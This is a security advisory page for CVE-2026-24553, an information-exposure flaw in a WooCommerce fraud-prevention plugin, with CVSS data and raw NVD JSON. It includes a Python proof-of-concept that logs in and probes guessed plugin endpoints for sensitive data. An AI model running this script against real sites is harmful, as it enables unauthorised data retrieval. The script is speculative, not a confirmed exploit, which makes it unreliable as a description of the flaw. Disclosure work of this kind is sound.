Security Vulnerability Report
中文
CVE-2026-24553 CVSS 4.3 MEDIUM

CVE-2026-24553

Published: 2026-01-23 15:16:12
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Dotstore Fraud Prevention For Woocommerce woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers allows Retrieve Embedded Sensitive Data.This issue affects Fraud Prevention For Woocommerce: from n/a through <= 2.3.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Fraud Prevention for WooCommerce <= 2.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24553 PoC - WordPress Fraud Prevention for WooCommerce Sensitive Data Exposure # Affected Version: <= 2.3.2 import requests import sys TARGET_URL = input("Enter target WordPress URL: ").rstrip('/') USERNAME = input("Enter WordPress username: ") PASSWORD = input("Enter WordPress password: ") session = requests.Session() # Step 1: Login to WordPress login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies) and 'wp-settings-' not in str(session.cookies): print("[-] Login failed!") sys.exit(1) print("[+] Login successful!") # Step 2: Exploit the sensitive data exposure vulnerability # Try common endpoints that might expose sensitive data endpoints = [ '/wp-admin/admin-ajax.php?action=woo_blocker_get_settings', '/wp-admin/admin-ajax.php?action=fraud_prevention_get_data', '/wp-json/woo-blocker/v1/settings', '/wp-admin/admin.php?page=woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers&action=export' ] print("\n[*] Attempting to retrieve sensitive data...") for endpoint in endpoints: url = TARGET_URL + endpoint try: response = session.get(url, timeout=10) if response.status_code == 200 and len(response.text) > 0: print(f"\n[+] Found accessible endpoint: {endpoint}") print(f"Response length: {len(response.text)} bytes") print(f"Response preview:\n{response.text[:500]}") except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") print("\n[*] PoC execution completed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24553", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:11.890", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Dotstore Fraud Prevention For Woocommerce woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers allows Retrieve Embedded Sensitive Data.This issue affects Fraud Prevention For Woocommerce: from n/a through <= 2.3.2."}, {"lang": "es", "value": "Vulnerabilidad de Exposición de Información Sensible del Sistema a una Esfera de Control No Autorizada en Dotstore Fraud Prevention para Woocommerce woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers permite Recuperar Datos Sensibles Incrustados. Este problema afecta a Fraud Prevention para Woocommerce: desde n/a hasta &lt;= 2.3.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-blocker-lite-prevent-fake-orders-and-blacklist-fraud-customers/vulnerability/wordpress-fraud-prevention-for-woocommerce-plugin-2-3-1-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}